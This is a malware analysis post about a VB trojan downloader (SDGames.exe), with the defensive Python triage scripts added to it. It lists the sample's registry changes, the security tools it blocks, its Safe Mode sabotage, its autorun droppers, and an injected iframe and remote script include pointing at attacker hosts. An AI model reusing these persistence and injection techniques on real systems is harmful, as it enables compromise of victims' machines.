The sample came from the deep-sample board; the post's title was boasting quite a bit, so I took a look.
Its behaviour is indeed not very nice, but the icon is good, a pretty ladybird. I like it ^_^
Sample info (multi-engine scan; columns: scanner, engine version, signature version, signature date, result, scan time in seconds):
NORMAN         5.91.08          5.90                2007-12-06  W32/Hupigon.gen67                                        15.241
The Hacker     6.2.9            v00150              2007-12-04  W32/Behav-Heuristic-067                                   0.891
Prevx          V2               20071206            2007-12-06  TROJAN.DOWNLOADER.GEN                                     7.715
F-SECURE       5.51.6100        2007.12.04.09       2007-12-04  Trojan-Downloader.Win32.VB.lg [AVP]                      10.354
Kaspersky      5.5.10           2007.12.07          2007-12-07  Trojan-Downloader.Win32.VB.lg                            22.656
AntiVir        7.6.0.35         7.0.1.57            2007-12-07  TR/Crypt.FKM.Gen                                          8.346
QuickHeal      9.00             2007.12.05          2007-12-05  Suspicious - DNAScan                                      3.098
Fortinet       2.81-3.11        8.449               2007-12-03  Suspicious                                                4.023
NOD32          2.70.10          2708                2007-12-07  probably unknown NewHeur_PE virus                         0.593
F-PROT         4.4.1.52         20071206            2007-12-06  Possible W32/Heuristic-162!Eldorado (not disinfectable)   5.327
VirusBuster    4.3.19:9         9.116.3/11.0        2007-12-06  Packed/NSPack                                             4.753
McAfee         5.2.00           5179                2007-12-06  New Malware.u                                             5.254
SOPHOS         2.49.1           4.21                2007-12-07  Mal/VB-G                                                 15.872
nProtect       2007-12-05.00    1077844             2007-12-05  Generic.Malware.SP!DWYBVdTk.5A07877B                     10.357
BitDefender    7.60825.958438   7.16147             2007-12-07  Generic.Malware.SP!DWYBVdTk.5A07877B                     12.487
AVG            7.5.49.442       269.16.17/1176      2007-12-06  Downloader.Generic6.YBC                                   8.557
IKARUS         T3.1.01.15       2007.12.05.69943    2007-12-05  Backdoor.Win32.Agent.ahj                                  2.393
The engines that give it a proper name agree on a Visual Basic downloader (Trojan-Downloader.Win32.VB.lg); VirusBuster only reports the packer, NSPack, which is why several others fall back to heuristic or generic verdicts.
Main behaviour:
(1) Once activated, the virus first changes the system date, as these usually do, and then creates the files:
C:\WINDOWS\system32\SDGames.exe
C:\WINDOWS\system32\Taskeep.vbs (re-runs the virus at intervals)
C:\WINDOWS\system32\Avpser.cmd (kills the processes of security software)
C:\WINDOWS\system32\netshare.cmd (shares out every partition)
C:\WINDOWS\system32\AUTORUN.INF
(2) It then modifies the registry. A whole pile of settings is involved; repairing them one by one by hand, without a tool, would be quite a chore:
RegSetValue:HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\run
Value:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
Value:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD
Value:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusOverride
Value:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
Value:Type: REG_DWORD, Length: 4, Data: 2
RegSetValue:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Value:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCR\txtfile\shell\open\command\(Default)
Value:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCR\regfile\shell\open\command\(Default)
Value:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
Value:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKLM\System\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber
Value:Type: REG_DWORD, Length: 4, Data: 3389
RegSetValue:HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
Value:Type: REG_DWORD, Length: 4, Data: 3389
RegSetValue:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache\Enabled
Value:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShutdownWithoutLogon
Value:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\EnableAdminTSRemote
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Control\Terminal Server\TSEnabled
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Services\TermDD\Start
Value:Type: REG_DWORD, Length: 4, Data: 2
RegSetValue:HKLM\System\CurrentControlSet\Services\TermService\Start
Value:Type: REG_DWORD, Length: 4, Data: 2
RegSetValue:HKU\.DEFAULT\Keyboard Layout\Toggle\Hotkey
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Services\lanmanserver\parameters\AutoShareWks
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Services\lanmanserver\parameters\AutoShareServer
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Control\Lsa\restrictanonymous
Value:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
Value:Type: REG_SZ, Length: 64, Data: http://www.zhidaobaidu.10mb.cn/
RegSetValue:HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
Value:Type: REG_SZ, Length: 14, Data: wangma
RegSetValue:HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
Value:Type: REG_SZ, Length: 14, Data: wangma
RegSetValue:HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL
Value:Type: REG_SZ, Length: 14, Data: wangma
RegSetValue:HKLM\System\CurrentControlSet\Services\SharedAccess\Start
Value:Type: REG_DWORD, Length: 4, Data: 4
RegSetValue:HKLM\System\CurrentControlSet\Services\wuauserv\Start
Value:Type: REG_DWORD, Length: 4, Data: 4
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Winstary
Value:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegDeleteValue:HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
RegDeleteValue:HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
Taken together: four autostart points plus the .txt and .reg file associations, the Task Manager, registry editor, Folder Options and hidden-file view disabled, the Windows Firewall (SharedAccess) and Automatic Updates (wuauserv) services set to Disabled (4), Terminal Services switched on and allowed through on port 3389, the administrative shares and anonymous enumeration re-enabled, and the IE start page pointed at the attacker's site. The two RegDeleteValue entries remove the disk-drive class ({4D36E967-E325-11CE-BFC1-08002BE10318} is the DiskDrive setup class) from both Safe Mode driver lists, so the machine can no longer be booted into Safe Mode, with or without networking, to clean it.
(3) Next comes the usual pile of IFEO (Image File Execution Options) entries, covering these images (security tools, QQ and msconfig):
360rpt.exe, 360Safe.exe, 360tray.EXE, adam.exe, AgentSvr.exe, AppSvc32.exe, autoruns.exe, avgrssvc.exe, AvMonitor.exe, avp.com, avp.exe, CCenter.exe, ccSvcHst.exe, FileDsty.exe, FTCleanerShell.exe, HijackThis.exe, IceSword.exe, iparmo.exe, Iparmor.exe, isPwdSvc.exe, kabaload.exe, KaScrScn.SCR, KASMain.exe, KASTask.exe, KAV32.exe, KAVDX.exe, KAVPFW.exe, KAVSetup.exe, KAVStart.exe, KISLnchr.exe, KMailMon.exe, KMFilter.exe, KPFW32.exe, KPFW32X.exe, KPFWSvc.exe, KRegEx.exe, KRepair.COM, KsLoader.exe, KVCenter.kxp, KvDetect.exe, KvfwMcl.exe, KVMonXP.kxp, KVMonXP_1.kxp, kvol.exe, kvolself.exe, KvReport.kxp, KVScan.kxp, KVSrvXP.exe, KVStub.kxp, kvupload.exe, kvwsc.exe, KvXP.kxp, KvXP_1.kxp, KWatch.exe, KWatch9x.exe, KWatchX.exe, loaddll.exe, MagicSet.exe, mcconsol.exe, mmqczj.exe, mmsk.exe, NAVSetup.exe, nod32krn.exe, nod32kui.exe, PFW.exe, PFWLiveUpdate.exe, QHSET.exe, Ras.exe, Rav.exe, RavMon.exe, RavMonD.exe, RavStub.exe, RavTask.exe, RegClean.exe, rfwcfg.exe, RfwMain.exe, rfwProxy.exe, rfwsrv.exe, Rsaupd.exe, runiep.exe, scan32.exe, safelive.exe, shcfg32.exe, SmartUp.exe, SREng.exe, symlcsvc.exe, SysSafe.exe, TrojanDetector.exe, Trojanwall.exe, TrojDie.kxp, UIHost.exe, UmxAgent.exe, UmxAttachment.exe, UmxCfg.exe, UmxFwHlp.exe, UmxPol.exe, UpLive.EXE.exe, WoptiClean.exe, zxsweep.exe, MainCon.exe, srgui.exe, QQ.exe, Shadowservice.exe, msconfig.exe
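The registry and IFEO lists above are long enough that a triage script is the practical way to read them. The following is an added example (not the original post's tool): it parses the two-line "RegSetValue:<key>\<value>" / "Value:Type: ..., Data: ..." records in the monitor format quoted above and maps each write to the purpose it serves. The sample log is constructed from lines in the post plus one IFEO record that is an assumption: the post names the hijacked images but not the Debugger value, which the example assumes points at the dropped SDGames.exe.

```python
"""Triage a RegSetValue/RegDeleteValue monitor log in the format quoted above.

Added example, not the post's tool. parse_log() reads the two-line records
(a RegDeleteValue has no data line); triage() explains each write with a rule.
SAMPLE_LOG is constructed from the post; the IFEO record's Debugger value is an
assumption (the post lists the images, not the value they were pointed at)."""
import re
from dataclasses import dataclass

RECORD_RE = re.compile(r'^(RegSetValue|RegDeleteValue):(.+?)\s*$')
DATA_RE = re.compile(r'^(?:Value|值):\s*Type:\s*(\w+),\s*Length:\s*\d+,\s*Data:\s*(.*?)\s*$')
MALWARE_IMAGE = r'c:\windows\system32\sdgames.exe'

@dataclass
class RegEvent:
    op: str            # RegSetValue or RegDeleteValue
    key: str           # key path without the value name
    name: str          # value name; "(Default)" for a key's default value
    vtype: str = ''    # REG_SZ / REG_DWORD; empty for deletes
    data: str = ''     # data exactly as the monitor printed it

def parse_log(text):
    """Turn monitor output into RegEvent records."""
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        m = RECORD_RE.match(line)
        if m:
            key, _, name = m.group(2).rpartition('\\')
            events.append(RegEvent(m.group(1), key, name))
            continue
        m = DATA_RE.match(line)
        if m and events and events[-1].op == 'RegSetValue':
            events[-1].vtype, events[-1].data = m.group(1), m.group(2)
    return events

# (category, regex searched in the lower-cased "<key>\<name>", extra condition or None)
RULES = [
    ('persistence', r'\\currentversion\\run\\[^\\]+$', None),
    ('persistence', r'\\windows nt\\currentversion\\windows\\(run|load)$', None),
    ('persistence', r'\\image file execution options\\[^\\]+\\debugger$', None),
    ('persistence', r'^hkcr\\\w+\\shell\\open\\command\\\(default\)$',
     lambda ev: ev.data.lower() == MALWARE_IMAGE),
    ('defense_evasion', r'\\policies\\(system|explorer)\\(disableregistrytools|disabletaskmgr|'
     r'nofolderoptions|nocontrolpanel|nosettaskbar)$', lambda ev: ev.data == '1'),
    ('defense_evasion', r'\\explorer\\advanced\\(hidden|hidefileext)$', None),
    ('defense_evasion', r'\\showall\\checkedvalue$', lambda ev: ev.data == '0'),
    ('defense_evasion', r'\\services\\(wuauserv|sharedaccess)\\start$', lambda ev: ev.data == '4'),
    ('defense_evasion', r'\\safeboot\\(minimal|network)\\', lambda ev: ev.op == 'RegDeleteValue'),
    ('remote_access', r'\\terminal server\\fdenytsconnections$', lambda ev: ev.data == '0'),
    ('remote_access', r'\\terminal server\\tsenabled$', lambda ev: ev.data == '1'),
    ('remote_access', r'\\services\\(termservice|termdd)\\start$', lambda ev: ev.data == '2'),
    ('exposure', r'\\lanmanserver\\parameters\\autoshare(wks|server)$', lambda ev: ev.data == '1'),
    ('exposure', r'\\lsa\\restrictanonymous$', lambda ev: ev.data == '0'),
    ('browser_hijack', r'\\internet explorer\\main\\(start page|default_page_url)$', None),
]

def triage(text):
    """Return (category, full path, op, data) for every event a rule explains."""
    findings = []
    for ev in parse_log(text):
        full = f'{ev.key}\\{ev.name}'
        for category, pattern, cond in RULES:
            if re.search(pattern, full.lower()) and (cond is None or cond(ev)):
                findings.append((category, full, ev.op, ev.data))
                break          # first matching rule wins
    return findings

def summarize(findings):
    """Count findings per category, e.g. {'persistence': 3, ...}."""
    counts = {}
    for category, *_ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts

SAMPLE_LOG = r"""
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Winstary
Value:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger
Value:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCR\txtfile\shell\open\command\(Default)
Value:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Value:Type: REG_DWORD, Length: 4, Data: 0
RegDeleteValue:HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
RegSetValue:HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
Value:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKLM\System\CurrentControlSet\Services\lanmanserver\parameters\AutoShareWks
Value:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
Value:Type: REG_SZ, Length: 64, Data: http://www.zhidaobaidu.10mb.cn/
RegSetValue:HKU\.DEFAULT\Keyboard Layout\Toggle\Hotkey
Value:Type: REG_DWORD, Length: 4, Data: 1
"""
```

Run `triage(SAMPLE_LOG)` on the full log from the post (after the "值:" prefix is translated, both spellings are accepted) and everything in the categories persistence and defense_evasion is what has to be undone before the security tools in the IFEO list can even be started; the Keyboard Layout hotkey write is left unexplained on purpose, as a reminder that a rule set should only claim what it knows.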
(4) It adds the following to C:\WINDOWS\system.ini; this trick seems rare these days:
[windows]
shell=explorer.exe & C:\WINDOWS\system32\SDGames.exe
load=C:\WINDOWS\system32\SDGames.exe
(5) In the root of every partition it generates the following files (the .url files all point to SDGames.exe):
SDGames.exe
Windows.url
Recycleds.url
新建文件夹.url ("New Folder.url")
AUTORUN.INF
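The three droppers in (4) and (5) share one format: INI-style text whose value launches an executable. The following added example (not the author's code) parses that format once and applies the three checks a cleaner needs: the system.ini [windows] lines must launch nothing beyond explorer.exe, AUTORUN.INF must contain no open/shellexecute/shell\...\command key, and a .url whose URL= points at a local file is a lure. The system.ini text is the one quoted in the post; the AUTORUN.INF and Windows.url bodies are constructed, since the post only says the .url files point at SDGames.exe, so their exact keys and the file:/// form are assumptions.

```python
"""Checks for the INI-style droppers the post lists: the system.ini [windows]
lines, AUTORUN.INF in each partition root, and the .url lures.

Added example, not the author's tool. SYSTEM_INI is quoted from the post;
AUTORUN_INF and WINDOWS_URL are constructed (their keys are assumptions)."""
import re

IMAGE_RE = re.compile(r'([\w\-]+\.(?:exe|com|bat|cmd|vbs|scr|pif))\b', re.I)

def parse_ini(text):
    """Minimal INI parser: {section: {key: value}}, names lower-cased,
    ';' comments skipped, first occurrence of a duplicate key kept."""
    sections, current = {}, ''
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition('=')
        if sep:
            sections.setdefault(current, {}).setdefault(key.strip().lower(), value.strip())
    return sections

def launched_images(value):
    """Executable file names referenced in a value. A shell= line of the form
    'explorer.exe & <path>' yields both names, which is how it smuggles a second process."""
    return [m.group(1).lower() for m in IMAGE_RE.finditer(value)]

def check_system_ini(text):
    """shell= must launch nothing but explorer.exe and load= must be empty."""
    win = parse_ini(text).get('windows', {})
    findings = []
    shell = win.get('shell', 'explorer.exe')
    if launched_images(shell) != ['explorer.exe']:
        findings.append(('shell', shell))
    if win.get('load'):
        findings.append(('load', win['load']))
    return findings

def check_autorun_inf(text):
    """Any key that makes Explorer run something on insert/open is reported."""
    auto = parse_ini(text).get('autorun', {})
    return [(k, v) for k, v in auto.items()
            if k in ('open', 'shellexecute') or (k.startswith('shell\\') and k.endswith('\\command'))]

def check_url_file(text):
    """A .url is a lure when URL= points at a local file instead of a web address."""
    url = parse_ini(text).get('internetshortcut', {}).get('url', '')
    if url.lower().startswith('file:') or re.match(r'^[a-z]:\\', url, re.I):
        return launched_images(url)
    return []

def triage_root(files):
    """files: {name: content} as found in a partition root; returns {name: findings}."""
    report = {}
    for name, content in files.items():
        lower = name.lower()
        if lower == 'system.ini':
            hits = check_system_ini(content)
        elif lower == 'autorun.inf':
            hits = check_autorun_inf(content)
        elif lower.endswith('.url'):
            hits = check_url_file(content)
        else:
            continue
        if hits:
            report[name] = hits
    return report

# SYSTEM_INI is quoted from the post; AUTORUN_INF and WINDOWS_URL are constructed samples.
SYSTEM_INI = """[windows]
shell=explorer.exe & C:\\WINDOWS\\system32\\SDGames.exe
load=C:\\WINDOWS\\system32\\SDGames.exe
"""
AUTORUN_INF = """[autorun]
open=SDGames.exe
shell\\Auto\\command=SDGames.exe
shell=Auto
"""
WINDOWS_URL = """[InternetShortcut]
URL=file:///C:/SDGames.exe
IconIndex=0
"""
```

`triage_root` is meant to be fed the root listing of each partition; a clean system.ini yields nothing, and a .url pointing at a real http URL is left alone, so the output is only the lines that actually have to be removed.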
(6) Then it infects: it scans the .exe files on the non-system partitions; any file smaller than itself it simply overwrites, any file larger than itself it infects.
That is where it goes wrong. Every time the virus, or an infected file, is run, it carries out the operations above using whatever file is currently running, so that file has become the virus's main body, and the copy dropped into system32 is that same file that was run.
In the extreme case this infection scheme can make the file grow with every hop; by the time it runs on some machine it may be enormous, and once it runs most of the .exe files there will simply be overwritten...
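The growth the author describes is easy to model. The following is an added example, not the author's code, and its mechanics are assumptions: "overwrite" replaces a host smaller than the running image with that image, "infect" turns a larger host into host plus image (a prepended body), and the image that runs on the next machine is one of the infected files carried over from the previous one. The host sizes are constructed.

```python
"""A model of the size-growth failure mode described above. Added example, not
the author's code; the overwrite/infect mechanics and the carry-over rule are
assumptions, and HOSTS_KB is a constructed partition layout."""

def infect_partition(image_size, hosts):
    """One pass over a partition's .exe sizes. Returns (new sizes, overwritten, infected)."""
    out, overwritten, infected = [], 0, 0
    for size in hosts:
        if size < image_size:
            out.append(image_size)          # replaced wholesale: the host program is gone
            overwritten += 1
        else:
            out.append(size + image_size)   # still carries the original program
            infected += 1
    return out, overwritten, infected

def spread(initial_image, hosts_per_machine, machines, carry='max'):
    """Run the same partition layout on successive machines. carry='max' takes the
    largest infected file to the next machine (worst case), 'min' the smallest
    (best case). Returns (image size, overwritten, infected) per machine and stops
    once the image is so large that nothing survives infection."""
    image, history = initial_image, []
    for _ in range(machines):
        sizes, overwritten, infected = infect_partition(image, hosts_per_machine)
        history.append((image, overwritten, infected))
        if infected == 0:
            break
        survivors = [s for s in sizes if s > image]   # exactly the infected files
        image = max(survivors) if carry == 'max' else min(survivors)
    return history

# Constructed sizes in KB: a 100 KB dropper loose on a partition with five programs.
HOSTS_KB = [50, 120, 300, 800, 2000]
```

Even in the best case, where the smallest infected file is the one that travels, the image never shrinks, so the share of hosts that get overwritten rather than infected rises on every machine until the virus is destroying everything it touches, which is the author's point.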
(7) It also writes an iframe into web page files, pointing to http://zhidaobaidu.10mb.cn/
Other related points
http://zhidaobaidu.10mb.cn is a site that imitates Baidu; "imitates" is generous, it actually just has an iframe that loads http://www.baidu.com/...
There is also a script include on it that I think I have seen before, but it is dead now...
<script language=javascript src=http://xxx.bao01.com/0.js></script>
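Both the injection in (7) and the lookalike site above come down to the same thing: a page loading an iframe or script from a host that is not its own. The following added example (not the author's tool) finds such references in a page and strips the elements that point at a given set of hosts. The victim page is constructed and its own host name is an assumption; the iframe target and the `<script>` line inside it are the ones quoted in the post.

```python
"""Find iframes and script includes that load from a foreign host, and remove
the ones pointing at known-bad hosts. Added example, not the author's tool.
VICTIM_PAGE is constructed; only the injected iframe URL and the <script>
line are taken from the post."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class _SrcCollector(HTMLParser):
    """Collect (tag, src, attrs) for every iframe/script that has a src attribute."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ('iframe', 'script'):
            a = {k: (v or '') for k, v in attrs}   # value is None for bare attributes
            if a.get('src'):
                self.refs.append((tag, a['src'], a))

def _is_hidden(attrs):
    """Zero/one-pixel frames or display:none are the usual way an injection stays unseen."""
    style = attrs.get('style', '').replace(' ', '').lower()
    return (attrs.get('width') in ('0', '1') or attrs.get('height') in ('0', '1')
            or 'display:none' in style or 'visibility:hidden' in style)

def external_refs(html, own_host):
    """Every iframe/script loading from a host other than own_host; relative src is skipped."""
    p = _SrcCollector()
    p.feed(html)
    found = []
    for tag, src, attrs in p.refs:
        host = urlparse(src).hostname
        if host and host.lower() != own_host.lower():
            found.append({'tag': tag, 'src': src, 'host': host,
                          'hidden': tag != 'script' and _is_hidden(attrs)})
    return found

def strip_hosts(html, hosts):
    """Remove whole iframe/script elements whose src is on one of the given hosts.
    The host must be followed by a quote, '/', ':', '?' or '>' so a longer host name does not match."""
    alt = '|'.join(re.escape(h) for h in hosts)
    pattern = re.compile(r'<(iframe|script)\b[^>]*\bsrc\s*=\s*["\']?https?://(?:' + alt +
                         r')(?:["\'/:?][^>]*)?>.*?</\1\s*>', re.I | re.S)
    return pattern.sub('', html)

# Constructed victim page; the iframe target and the <script> line are from the post.
VICTIM_PAGE = """<html><head><title>Home</title>
<script src="/js/site.js"></script></head>
<body><h1>Welcome</h1>
<iframe src="http://zhidaobaidu.10mb.cn/" width="0" height="0" frameborder="0"></iframe>
<script language=javascript src=http://xxx.bao01.com/0.js></script>
</body></html>"""
```

Run `external_refs` over the lookalike site itself, with its own host as `own_host`, and the iframe that loads http://www.baidu.com/ shows up in exactly the same way, which is the whole of its "imitation". The regex-based `strip_hosts` is deliberate: it keeps the rest of the page byte-for-byte, which a DOM round-trip would not.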
Please keep this notice when reposting! (http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html)
Author: dikex (六翼刺猬). Original link: http://hi.baidu.com/dikex/blog/item/1534ae8f9896e8f9513d92d2.html